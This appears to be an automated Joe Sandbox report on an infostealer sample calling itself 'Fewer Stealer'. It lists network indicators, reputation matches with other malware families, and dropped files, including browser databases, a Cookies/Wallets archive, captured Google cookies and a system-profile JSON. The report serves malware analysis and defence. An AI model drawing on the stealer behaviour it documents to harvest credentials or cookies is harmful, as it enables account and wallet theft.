https://www.quad9.net/home/privacy/Quad9 | defender.exe, 0000000C.00000000.1547993492.00007FF7F56C2000.00000002.00000001.01000000.00000009.sdmp, defender.exe, 0000001C.00000000.1783866616.00007FF7F56C2000.00000002.00000001.01000000.00000009.sdmp | false | Avira URL Cloud: safe | unknown
https://perfetto.dev/docs/contributing/getting-started#community). | defender.exe, 0000000C.00000000.1547993492.00007FF7F56C2000.00000002.00000001.01000000.00000009.sdmp, defender.exe, 0000001C.00000000.1783866616.00007FF7F56C2000.00000002.00000001.01000000.00000009.sdmp | false | Avira URL Cloud: safe | unknown
http://nuget.org/NuGet.exe | powershell.exe, 00000017.00000002.1646408112.0000023AB1531000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.1646408112.0000023AB13EE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.1612107420.0000023AA2CC6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.1743397396.0000019ADD86E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.1743397396.0000019ADD9B1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.1675946104.0000019ACF142000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.apache.org/licenses/LICENSE-2.0 | powershell.exe, 00000017.00000002.1612107420.0000023AA253C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.1675946104.0000019ACEF0A000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://chromeenterprise.google/policies/#BrowserSwitcherEnabled | zh-CN.pak.0.dr, fr.pak.0.dr | false | Avira URL Cloud: safe | unknown
https://dns10.quad9.net/dns-querydns10.quad9.net9.9.9.10149.112.112.102620:fe::102620:fe::fe:10 | defender.exe, 0000000C.00000000.1547993492.00007FF7F56C2000.00000002.00000001.01000000.00000009.sdmp, defender.exe, 0000001C.00000000.1783866616.00007FF7F56C2000.00000002.00000001.01000000.00000009.sdmp | false | Avira URL Cloud: safe | unknown
https://odvr.nic.cz/doh | defender.exe, 0000000C.00000000.1547993492.00007FF7F56C2000.00000002.00000001.01000000.00000009.sdmp, defender.exe, 0000001C.00000000.1783866616.00007FF7F56C2000.00000002.00000001.01000000.00000009.sdmp | false | Avira URL Cloud: safe | unknown
https://chrome.google.com/webstore/category/extensions | zh-CN.pak.0.dr, fr.pak.0.dr | false | Avira URL Cloud: safe | unknown
https://doh.cleanbrowsing.org/doh/family-filter | defender.exe, 0000001C.00000000.1783866616.00007FF7F56C2000.00000002.00000001.01000000.00000009.sdmp | false | Avira URL Cloud: safe | unknown
IP | Domain | Country | ASN | ASN Name | Malicious
162.159.61.3 | chrome.cloudflare-dns.com | United States | 13335 | CLOUDFLARENETUS | false
99.81.234.0 | unknown | United States | 16509 | AMAZON-02US | false
3.222.214.216 | clientstats1-dummy-server-lb-398743415.us-east-1.elb.amazonaws.com | United States | 14618 | AMAZON-AESUS | false
52.30.21.185 | socket-eu-ingress-1850214078.eu-west-1.elb.amazonaws.com | United States | 16509 | AMAZON-02US | false
185.111.234.27 | setekshome.com | Turkey | 51557 | TR-FBSTR | false
52.48.38.99 | ingress-sticky-haproxy-eu-da5b7868dc470a9a.elb.eu-west-1.amazonaws.com | United States | 16509 | AMAZON-02US | false
172.64.41.3 | unknown | United States | 13335 | CLOUDFLARENETUS | false
Joe Sandbox version:40.0.0 Tourmaline
Analysis ID:1487580
Start date and time:2024-08-04 16:22:27 +02:00
Joe Sandbox product:CloudBasic
Overall analysis duration:0h 9m 5s
Hypervisor based Inspection enabled:false
Report type:full
Cookbook file name:default.jbs
Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed:34
Number of new started drivers analysed:0
Number of existing processes analysed:0
Number of existing drivers analysed:0
Number of injected processes analysed:1
Technologies:
  • HCA enabled
  • EGA enabled
  • AMSI enabled
Analysis Mode:default
Analysis stop reason:Timeout
Sample name:SecuriteInfo.com.HEUR.Trojan.Script.Generic.5591.10617.exe
Detection:MAL
Classification:mal60.spyw.winEXE@29/139@9/7
EGA Information:
  • Successful, ratio: 100%
HCA Information:
  • Successful, ratio: 100%
  • Number of executed functions: 4
  • Number of non-executed functions: 0
Cookbook Comments:
  • Found application associated with file extension: .exe
  • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, SgrmBroker.exe, MoUsoCoreWorker.exe, conhost.exe, svchost.exe
  • Excluded IPs from analysis (whitelisted): 142.250.65.195, 142.251.32.99
  • Excluded domains from analysis (whitelisted): fs.microsoft.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, time.windows.com, www.gstatic.com, fe3cr.delivery.mp.microsoft.com
  • Not all processes were analyzed, report is missing behavior information
  • Report size exceeded maximum capacity and may have missing behavior information.
  • Report size getting too big, too many NtEnumerateKey calls found.
  • Report size getting too big, too many NtOpenKeyEx calls found.
  • Report size getting too big, too many NtProtectVirtualMemory calls found.
  • Report size getting too big, too many NtQueryAttributesFile calls found.
  • Report size getting too big, too many NtQueryValueKey calls found.
  • Report size getting too big, too many NtQueryVolumeInformationFile calls found.
Time | Type | Description
11:35:00 | API Interceptor | 11x Sleep call for process: powershell.exe modified
11:36:00 | API Interceptor | 281x Sleep call for process: explorer.exe modified
Match | Associated Sample Name / URL | Detection | Threat Name

Match: 162.159.61.3
  sorto.exe | malicious | Amadey, Babadeda, Stealc, Vidar
  random.exe | malicious | Babadeda
  jp95FFMUoh.exe | malicious | Amadey, Babadeda, Stealc, Vidar
  random.exe | malicious | Babadeda
  sorto.exe | malicious | Amadey, Babadeda, Stealc
  random.exe | malicious | Babadeda
  #U0417#U0410#U041f#U0420#U041e#U0421.exe | malicious | FormBook
  PDFpower (1).exe | malicious | Unknown
  setup.exe | malicious | Amadey, Babadeda, Stealc, Vidar
  SecuriteInfo.com.decompression.bomb.32349.22015.exe | malicious | Unknown

Match: 99.81.234.0
  https://isuecenter.dig4pnjky2v0q.amplifyapp.com/#/ | malicious | Unknown

Match: 52.48.38.99
  https://helpcenter.d1684u00tkwyh2.amplifyapp.com/#/ | malicious | Unknown
  https://isuecenter.dig4pnjky2v0q.amplifyapp.com/#/ | malicious | Unknown

Match: 172.64.41.3
  sorto.exe | malicious | Amadey, Babadeda, Stealc, Vidar
  random.exe | malicious | Babadeda
  jp95FFMUoh.exe | malicious | Amadey, Babadeda, Stealc, Vidar
  random.exe | malicious | Babadeda
  sorto.exe | malicious | Amadey, Babadeda, Stealc
  random.exe | malicious | Babadeda
  #U0417#U0410#U041f#U0420#U041e#U0421.exe | malicious | FormBook
  PDFpower (1).exe | malicious | Unknown
  setup.exe | malicious | Amadey, Babadeda, Stealc, Vidar
  SecuriteInfo.com.decompression.bomb.32349.22015.exe | malicious | Unknown
Match | Associated Sample Name / URL | Detection | Threat Name | Context

Match: clientstats1-dummy-server-lb-398743415.us-east-1.elb.amazonaws.com
  https://www.notism.io/-/716602fa429d680becc7a0edb | malicious | Unknown | 18.211.209.94
  original.eml | malicious | Unknown | 44.215.242.31
  RFQ Webcor Construction MV23932.eml | malicious | HTMLPhisher | 44.205.90.123
  https://www.ticketlike.fun/ | malicious | Unknown | 44.205.90.123
  QmbMNrVEEND8h5YxGjfffD2Njdy7gy2PWGmtq67UAYmiWu.html | malicious | Unknown | 54.85.25.116
  https://serviciomacpcexpress.info/wp-includes/irz/ | malicious | Phisher | 23.21.153.157
  https://u9132105.ct.sendgrid.net/ls/click?upn=1I1mRSxHmNOlE22wVd-2F6i-2BT2bfJpsViD0CikMXRD0MVAri-2BQwdecKhyiJmj97khpO4527GfxFS6h7Y97sR0-2BDGlKEAaQKyABmRDHLN-2B7sbuUh3qilKWBJCzp0w2BmXSxsRLqJ6hg4c2eOdc4SRAT6g-3D-3DoOZr_TUhSZDGzBLgvInB14AqJEdiNMQts-2BR5M9ngIQkhoN3GSq3dNkEAz-2FRz5KQd4vx86Rgfmm-2B4rYbnEPom-2Bt-2F7WSpl798FTYEYEoeFf60PW0v5UXvQmWq4w3AfmFVjTDM-2FlsB3hhT9vPMcYFEi6vOfRl8t18gLlUaIpnonIIfced4Yp-2FPd2sU9h5iIHkEFJmCInOcF5lJTxKBG92zkbdVv7Ag-3D-3D | malicious | Unknown | 54.175.206.14
  https://spaces.hightail.com/receive/Z4BNlNUQd3/dXMtOThkYmJlNjktYjQ2MC00NWQ0LTgxODAtZTAyMmRhNGJkNmM3 | malicious | HTMLPhisher | 52.203.75.153
  https://www.cakeresume.com/s--MSKY6gJBRd9r9FzWxIaHag--/paula-barata | malicious | Unknown | 54.243.70.123
  http://applecreekkingsville.com | malicious | Unknown | 3.229.47.106

Match: socket-eu-ingress-1850214078.eu-west-1.elb.amazonaws.com
  https://helpcenter.d1684u00tkwyh2.amplifyapp.com/#/ | malicious | Unknown | 34.253.251.171
  https://isuecenter.dig4pnjky2v0q.amplifyapp.com/#/ | malicious | Unknown | 34.240.119.52
  https://account.booking-sign.com/sign-in?op_token=Y5VK0mvaMy3A7BhJ | malicious | Unknown | 52.19.171.61
  https://meta-support-appeal-121990471.web.app/?fbclid=IwAR2ERcmpRDTqhoR3yP2aGaz5HMr2YatUE6jHnHB-ZmqfmSZHkA8481CtMGU#/ | malicious | Unknown | 54.76.231.252

Match: chrome.cloudflare-dns.com
  sorto.exe | malicious | Amadey, Babadeda, Stealc, Vidar | 162.159.61.3
  random.exe | malicious | Babadeda | 172.64.41.3
  jp95FFMUoh.exe | malicious | Amadey, Babadeda, Stealc, Vidar | 162.159.61.3
  random.exe | malicious | Babadeda | 162.159.61.3
  sorto.exe | malicious | Amadey, Babadeda, Stealc | 162.159.61.3
  random.exe | malicious | Babadeda | 162.159.61.3
  #U0417#U0410#U041f#U0420#U041e#U0421.exe | malicious | FormBook | 162.159.61.3
  PDFpower (1).exe | malicious | Unknown | 172.64.41.3
  setup.exe | malicious | Amadey, Babadeda, Stealc, Vidar | 162.159.61.3
  SecuriteInfo.com.decompression.bomb.32349.22015.exe | malicious | Unknown | 162.159.61.3

Match: ingress-sticky-haproxy-eu-da5b7868dc470a9a.elb.eu-west-1.amazonaws.com
  https://helpcenter.d1684u00tkwyh2.amplifyapp.com/#/ | malicious | Unknown | 52.48.38.99
  https://isuecenter.dig4pnjky2v0q.amplifyapp.com/#/ | malicious | Unknown | 52.48.38.99
  https://account.booking-sign.com/sign-in?op_token=Y5VK0mvaMy3A7BhJ | malicious | Unknown | 54.216.83.132
Match | Associated Sample Name / URL | Detection | Threat Name | Context

Match: AMAZON-02US
  sorto.exe | malicious | Amadey, Babadeda, Stealc, Vidar | 108.156.60.6
  random.exe | malicious | Babadeda | 52.222.236.80
  arm4.elf | malicious | Unknown | 34.249.145.219
  Urq5Bp4bgs.elf | malicious | Unknown | 13.244.111.254
  6PXS8SZtD8.exe | malicious | AsyncRAT | 3.140.223.7
  w859ZBDwaQ.exe | malicious | Unknown | 52.29.131.233
  w859ZBDwaQ.exe | malicious | Unknown | 52.29.131.233
  Guidelines_for_Citizen_Safety.msi | malicious | AteraAgent | 35.157.63.229
  SecuriteInfo.com.Program.Unwanted.5011.11652.31740.exe | malicious | PureLog Stealer | 99.84.208.6
  SecuriteInfo.com.Program.Unwanted.5011.11652.31740.exe | malicious | PureLog Stealer | 13.224.189.18
Match: AMAZON-AESUS
  w859ZBDwaQ.exe | malicious | Unknown | 107.23.203.25
  w859ZBDwaQ.exe | malicious | Unknown | 34.194.105.96
  wKrQaAEaJ4.elf | malicious | Mirai | 18.233.39.244
  https://jon0472sbcglobalne.wixsite.com/my-site-1 | malicious | Unknown | 44.219.134.238
  https://16784846511.cloud/ | malicious | Unknown | 3.208.56.98
  http://cdn.amxprd.com/en-us/business/checking/get-started/using-your-business-debit-card | malicious | Unknown | 54.234.53.240
  okZYzMZtnk.elf | malicious | Mirai | 54.8.106.132
  Tn08qpE9Le.elf | malicious | Mirai | 52.22.221.203
  xd.arm7.elf | malicious | Mirai | 54.22.37.227
  xd.arm.elf | malicious | Mirai | 18.208.42.28

Match: CLOUDFLARENETUS
  sorto.exe | malicious | Amadey, Babadeda, Stealc, Vidar | 172.64.41.3
  random.exe | malicious | Babadeda | 172.64.41.3
  Microsoft 3D.exe | malicious | LummaC, Go Injector | 104.21.80.78
  eEo6DAcnnx.exe | malicious | AsyncRAT, StormKitty, WorldWind Stealer | 172.67.196.114
  Urq5Bp4bgs.elf | malicious | Unknown | 1.15.163.159
  Setup.exe | malicious | LummaC, Go Injector, LummaC Stealer | 188.114.97.3
  vercath63.b-cdn.ps1 | malicious | LummaC, Go Injector | 172.67.175.230
  Setup.exe | malicious | LummaC, Go Injector, LummaC Stealer | 188.114.96.3
  Bank slip.exe | malicious | Snake Keylogger | 188.114.97.3
  2.bin.exe | malicious | LummaC, Go Injector, LummaC Stealer | 188.114.96.3
No context
Match | Associated Sample Name / URL | Detection | Threat Name

Match: C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\d3dcompiler_47.dll
  SecuriteInfo.com.Win64.Malware-gen.19582.16146.exe | malicious | Unknown
  SecuriteInfo.com.Win64.Malware-gen.19582.16146.exe | malicious | Unknown
  Installer Setup 9.7.0.exe | malicious | Unknown
  Roblox Account Manager.exe | malicious | Unknown
  lookworldafs1244.msi | malicious | Unknown
  node.js.exe | malicious | Unknown
  node.js.exe | malicious | Unknown
  LeqO0KJkDX.exe | malicious | Unknown
  LeqO0KJkDX.exe | malicious | Unknown
  etnY4xJd3y.exe | malicious | Unknown
Process:C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exe
File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
Category:dropped
Size (bytes):40960
Entropy (8bit):0.8553638852307782
Encrypted:false
SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
MD5:28222628A3465C5F0D4B28F70F97F482
SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
Malicious:true
Process:C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exe
File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
Category:dropped
Size (bytes):106496
Entropy (8bit):1.137181696973627
Encrypted:false
SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cR/k4:MnlyfnGtxnfVuSVumEHRM4
MD5:2D903A087A0C793BDB82F6426B1E8EFB
SHA1:E7872CC094C598B104DA25AC6C8BEB82DAB3F08F
SHA-256:AD67ADF2D572EF49DC95FD1A879F3AD3E0F4103DD563E713C466A1F02D57ED9A
SHA-512:90080A361F04158C4E1CCBB3DE653FFF742C29A49523B6143B0047930FC34DC0F1D043D3C1B2B759933E1685A4CB382FD9E41B7ACDD362A2217C3810AEF95E65
Malicious:true
Process:C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exe
File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 1
Category:dropped
Size (bytes):51200
Entropy (8bit):0.8746135976761988
Encrypted:false
SSDEEP:96:O8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:O8yLG7IwRWf4
MD5:9E68EA772705B5EC0C83C2A97BB26324
SHA1:243128040256A9112CEAC269D56AD6B21061FF80
SHA-256:17006E475332B22DB7B337F1CBBA285B3D9D0222FD06809AA8658A8F0E9D96EF
SHA-512:312484208DC1C35F87629520FD6749B9DDB7D224E802D0420211A7535D911EC1FA0115DC32D8D1C2151CF05D5E15BBECC4BCE58955CFFDE2D6D5216E5F8F3BDF
Malicious:false
Process:C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exe
File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 7, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 7
Category:dropped
Size (bytes):196608
Entropy (8bit):1.1215420383712111
Encrypted:false
SSDEEP:384:r2qOB1nxCkvSAELyKOMq+8HKkjucswRv8p3:aq+n0E9ELyKOMq+8HKkjuczRv89
MD5:9A809AD8B1FDDA60760BB6253358A1DB
SHA1:D7BBC6B5EF1ACF8875B36DEA141C9911BADF9F66
SHA-256:95756B4CE2E462117AF93FE5E35AD0810993D31CC6666B399BEE3B336A63219A
SHA-512:2680CEAA75837E374C4FB28B7A0CD1F699F2DAAE7BFB895A57FDB8D9727A83EF821F2B75B91CB53E00B75468F37DC3009582FC54F5D07B2B62F3026B0185FF73
Malicious:false
Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:data
Category:dropped
Size (bytes):1148
Entropy (8bit):5.325653416532896
Encrypted:false
SSDEEP:24:3ZDl1SKco4KmZjKbm51s4RPT6moUe7u1o+m9qr9t7J0gt/NKIl9r8Hq:Rl1SU4xymI4RfoUeCa+m9qr9tK8NDd
MD5:7908846B9139193DC5839557F5141820
SHA1:5E323E96CCFFFE7877AC8A4373EED123248DEF10
SHA-256:9451395F4CE12CB0E99E1245F940DF334DF979DD2E5CD890152964272E3ECD2E
SHA-512:BB04477250275B2C906909C445CD37582F36E785ED5C643CABD83297220F1EA0C098B88D7FB3BA932AE96391BEAE5083834C05DFD25F7E42609A8C33A3721F9A
Malicious:false
                                                                    Process:C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exe
                                                                    File Type:Zip archive data, at least v2.0 to extract, compression method=store
                                                                    Category:dropped
                                                                    Size (bytes):206
                                                                    Entropy (8bit):3.162089689334548
                                                                    Encrypted:false
                                                                    SSDEEP:3:vhjP6qv9lojm9P6qv9l30uEtiqv9l4X9mmNtiqv9l4DlllZJ0uS/9lnllln:5jSr0SC5NxQnxD/3J5iN
                                                                    MD5:F7842725DA4E0441082E93E77CE00940
                                                                    SHA1:BF98630287DAB5983CCF2400A557BFFB18FF96B8
                                                                    SHA-256:A01FBEEC5FBB034E813729D3612E6543A5C08194AF636B651E627887B07FD7C0
                                                                    SHA-512:9C5C33CCB2DDF387BDB4F43C0133ABE18C327761577294AF5017698E08DEB65F8368C9CBE71E77CC7D3D1962463839BB915B8B8ADEADA0C8C7BA89379F5455DC
                                                                    Malicious:false
                                                                    Preview:PK........g\.Y................Cookies/PK........g\.Y................Wallets/PK..........g\.Y.........................A....Cookies/PK..........g\.Y.........................A&...Wallets/PK..........l...L.....
                                                                    Process:C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exe
                                                                    File Type:ASCII text
                                                                    Category:dropped
                                                                    Size (bytes):77
                                                                    Entropy (8bit):3.40147237857684
                                                                    Encrypted:false
                                                                    SSDEEP:3:vrVr1w+EKcJW5KeBF3R3AV:pTEKcY5JFh3AV
                                                                    MD5:9B9B390AE47ABBA2CBCCA9D4DF3B0DCF
                                                                    SHA1:4387B1DD7C425EA81B36AF6805010C4EBA6C8C5F
                                                                    SHA-256:01266BD91CF7AC9D02A71FEB95A40D9CD4DA5C977364B2CE7736A0FE78F24259
                                                                    SHA-512:8ED8B7A8FE58C5353E428780ADCC20769E771A7256D3E08C11F43D6099B71489668FEF88E5F6033140315C40A70F19BFB11D0AB3F474F980BBB942F8DD5AAC60
                                                                    Malicious:false
                                                                    Preview:<================[]>================>..No autofills found for Google Default.
                                                                    Process:C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exe
                                                                    File Type:ASCII text
                                                                    Category:dropped
                                                                    Size (bytes):275
                                                                    Entropy (8bit):5.886485844013828
                                                                    Encrypted:false
                                                                    SSDEEP:6:Pk3rocHDyzxb6k3rocHDKJsXfaaW3UnhzrWgOsH6/8hwDFI0BFOqvu:c79EYk79xva3UhyL/8ObWv
                                                                    MD5:41147EE4DC55735ECDD0375BC242A40D
                                                                    SHA1:2141BEC34CBDBCD41B913A6FAE7376390141CF5B
                                                                    SHA-256:2C9B11ADC2B002FDB9DFD967EA553480828D7C8D04BDB8EB03D78061E4771E53
                                                                    SHA-512:07A5BB3CB2B83724C804AB1E4D17DD219B0378C3905D63E492DAC732B2346DCCED186443E992BD918DCD5161121726B54D68B031F7912B8FE37C651A62B66C44
                                                                    Malicious:false
                                                                    Preview:.google.com.TRUE./.FALSE.2597573456.1P_JAR.2023-10-05-07 ..google.com.TRUE./.FALSE.2597573456.NID.511=nNadqW9uTcY0OP6I3afnr71o6EzaYLsdpW4UEYN3vYq_rbRrNFxM1jozPGuhjORBZKKMz2tdDpVe7dNuTWp4CyK-zt5Is6wVElveWAfKQgwNJiKKtXHCCCmrlgzZTl5CiKjTeA2iQqf6zlRK2h8wg1hVpIsWsaKqaWJyHMPF3JA .
                                                                    Process:C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exe
                                                                    File Type:ASCII text, with no line terminators
                                                                    Category:dropped
                                                                    Size (bytes):19
                                                                    Entropy (8bit):3.536886723742169
                                                                    Encrypted:false
                                                                    SSDEEP:3:eNKXBmLn:oKXsLn
                                                                    MD5:C4EFD9A7B61EBF43B608440BE5E33369
                                                                    SHA1:926418256C277F1B11B575EC6E92CE6A844612F7
                                                                    SHA-256:ED4280859199DA5A8F25C0C6D533D0873460AC63368C14A69BBD863EA4BFB30F
                                                                    SHA-512:9EA97363868D61D3D51BD3804D638B71BA8DC65260800B3A54051B4725CF08E9D9880A12422A549D94A339C7267E858A7FF5CA9428D64051657134B5C6C20745
                                                                    Malicious:false
                                                                    Preview:No passwords found.
                                                                    Process:C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exe
                                                                    File Type:JSON data
                                                                    Category:dropped
                                                                    Size (bytes):605
                                                                    Entropy (8bit):5.230143074410793
                                                                    Encrypted:false
                                                                    SSDEEP:12:YJJZ7DGHkBDc3DF3xZAppqkDoagjxfex5/0LBe6jQkd682hoL:YJJZrBQ/qpqk8agjxfex5/0lrUkdAaL
                                                                    MD5:BE04BC9DF31E3485821D3B42ADD50526
                                                                    SHA1:2191CF0FA2CB22842E80F39B6C555CC6E42590DD
                                                                    SHA-256:2C9FDAD340830FB47CF5750CC0CC5B984D3FD855824AC19E489852BFC6C93334
                                                                    SHA-512:E9B3511B920F2599A185BC4809F3EBF5828704686C25C74682B33CBA544EF6D8EB419A80BABE9F59F5FB8414805D3ADB36B1B5FA913A7A1AD89A7DDAE58AE114
                                                                    Malicious:false
                                                                    Preview:{"ram":8589148160,"version":"Windows 10 Pro","homedir":"C:\\Users\\user","hostname":"841675","userInfo":"user","type":"Windows_NT","arch":"x64","release":"10.0.19045","roaming":"C:\\Users\\user\\AppData\\Roaming","local":"C:\\Users\\user\\AppData\\Local","temp":"C:\\Users\\user~1\\AppData\\Local\\Temp","countCore":"2","sysDrive":"C:","fileLoc":"C:\\Users\\user~1\\AppData\\Local\\Temp\\2goCimWNF4MQsElUG17heiczRtP","randomUUID":"6b777e561599d00cd9121851ee4fe177","start":1722785716103,"debug":false,"copyright":"<================[Fewer Stealer]>================>\n\n","url":null}
                                                                    Process:C:\Users\user\Desktop\SecuriteInfo.com.HEUR.Trojan.Script.Generic.5591.10617.exe
                                                                    File Type:ASCII text
                                                                    Category:dropped
                                                                    Size (bytes):1096
                                                                    Entropy (8bit):5.13006727705212
                                                                    Encrypted:false
                                                                    SSDEEP:24:36DiJHxRHuyPP3GtIHw1Gg9QH+sUW8Ok4F+d1o36qjFD:36DiJzfPvGt7ICQH+sfIte36AFD
                                                                    MD5:4D42118D35941E0F664DDDBD83F633C5
                                                                    SHA1:2B21EC5F20FE961D15F2B58EFB1368E66D202E5C
                                                                    SHA-256:5154E165BD6C2CC0CFBCD8916498C7ABAB0497923BAFCD5CB07673FE8480087D
                                                                    SHA-512:3FFBBA2E4CD689F362378F6B0F6060571F57E228D3755BDD308283BE6CBBEF8C2E84BEB5FCF73E0C3C81CD944D01EE3FCF141733C4D8B3B0162E543E0B9F3E63
                                                                    Malicious:false
                                                                    Preview:Copyright (c) Electron contributors.Copyright (c) 2013-2020 GitHub Inc...Permission is hereby granted, free of charge, to any person obtaining.a copy of this software and associated documentation files (the."Software"), to deal in the Software without restriction, including.without limitation the rights to use, copy, modify, merge, publish,.distribute, sublicense, and/or sell copies of the Software, and to.permit persons to whom the Software is furnished to do so, subject to.the following conditions:..The above copyright notice and this permission notice shall be.included in all copies or substantial portions of the Software...THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,.EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF.MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND.NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE.LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION.OF CONTRACT, TORT OR OTHERWISE, ARISIN
                                                                    Process:C:\Users\user\Desktop\SecuriteInfo.com.HEUR.Trojan.Script.Generic.5591.10617.exe
                                                                    File Type:HTML document, ASCII text
                                                                    Category:dropped
                                                                    Size (bytes):6766160
                                                                    Entropy (8bit):4.735324161006094
                                                                    Encrypted:false
                                                                    SSDEEP:24576:d7rs5kjWSnB3lWNeUmf0f6W6M6q6A6r/HXpErpem:rovj
                                                                    MD5:180F8ACC70405077BADC751453D13625
                                                                    SHA1:35DC54ACAD60A98AEEC47C7ADE3E6A8C81F06883
                                                                    SHA-256:0BFA9A636E722107B6192FF35C365D963A54E1DE8A09C8157680E8D0FBBFBA1C
                                                                    SHA-512:40D3358B35EB0445127C70DEB0CB87EC1313ECA285307CDA168605A4FD3D558B4BE9EB24A59568ECA9EE1F761E578C39B2DEF63AD48E40D31958DB82F128E0EC
                                                                    Malicious:false
                                                                    Preview: Generated by licenses.py; do not edit. --><!doctype html>.<html>.<head>.<meta charset="utf-8">.<meta name="viewport" content="width=device-width">.<meta name="color-scheme" content="light dark">.<title>Credits</title>.<link rel="stylesheet" href="chrome://resources/css/text_defaults.css">.<link rel="stylesheet" href="chrome://credits/credits.css">.</head>.<body>.<span class="page-title" style="float:left;">Credits</span>.<a id="print-link" href="#" style="float:right;" hidden>Print</a>.<div style="clear:both; overflow:auto;"> Chromium <3s the following projects -->.<div class="product">.<span class="title">2-dim General Purpose FFT (Fast Fourier/Cosine/Sine Transform) Package</span>.<span class="homepage"><a href="http://www.kurims.kyoto-u.ac.jp/~ooura/fft.html">homepage</a></span>.<input type="checkbox" hidden id="0">.<label class="show" for="0" tabindex="0"></label>.<div class="licence">.<pre>Copyright(C) 1997,2001 Takuya OOURA (email: ooura@kurims.kyoto-u.ac.jp)..You may us
                                                                    Process:C:\Users\user\Desktop\SecuriteInfo.com.HEUR.Trojan.Script.Generic.5591.10617.exe
                                                                    File Type:data
                                                                    Category:dropped
                                                                    Size (bytes):129690
                                                                    Entropy (8bit):7.91868310789661
                                                                    Encrypted:false
                                                                    SSDEEP:3072:AEKzwqCT4weSxQCS/qGTL2o418Gb0+VRLf0ld0GY3cQ39Vm2I:AEKzwt4hC4/rK18Gb0OV8ld0GecQ3f2
                                                                    MD5:8626E1D68E87F86C5B4DABDF66591913
                                                                    SHA1:4CD7B0AC0D3F72587708064A7B0A3BECA3F7B81C
                                                                    SHA-256:2CAA1DA9B6A6E87BDB673977FEE5DD771591A1B6ED5D3C5F14B024130A5D1A59
                                                                    SHA-512:03BCD8562482009060F249D6A0DD7382FC94D669A2094DEC08E8D119BE51BEF2C3B7B484BB5B7F805AE98E372DAB9383A2C11A63AB0F5644146556B1BB9A4C99
                                                                    Malicious:false
                                                                    Preview:..............t...#.....:.I....yp....y6....y.....y#....y.....y`....ym....y.....y.....yI....y.....y'"...y.,...y.7...y;9...yv:...y(<...y.<...y.B...yfH...y.J...y.K...y.L.....M...N...aP...IS...BV...uY...]...Pa....d..&..h..'..i..(.hk..)..l..*..m..+.An..0..n..1.....2.....>.....?.....@.....A.....B.P...C.}...D.....F.9...H.r...I.I...J.....K.....L.....M.....N.6...O.....Q..%..R..(..T..1..U..4..W..>..X..H..^..M.._..N..`.mW..a.._..b..`..c.Cb..d.$d..e.Jg..g..g..i..k..j.*m..k..n..l..p..m..s..n..s..o..u..p..v..r..y..s.|{..u..~..v.<...x.....y.....~.......r..................................8................l.....;..... ......................p.....2..... .....8.....>.......................M.......................^.......................x...r.R...s.....t.....u.K...v.....w.....x.....y.+...z.~...{.....|.....}.a...~.u....._..........._...........l...................................Y.......................;.................R.................w...........6.................].................z.......
                                                                    Process:C:\Users\user\Desktop\SecuriteInfo.com.HEUR.Trojan.Script.Generic.5591.10617.exe
                                                                    File Type:data
                                                                    Category:dropped
                                                                    Size (bytes):179971
                                                                    Entropy (8bit):7.941375268079628
                                                                    Encrypted:false
                                                                    SSDEEP:3072:rDQYaEQN6AJPrSxQCS/qGTafR54x5GMR+F44ffbdZnYw9p4AbIVGYoDd+HxNK/r4:rDQYaNN68rC4/Ygx5GMRejnbdZnVE6YR
                                                                    MD5:48515D600258D60019C6B9C6421F79F6
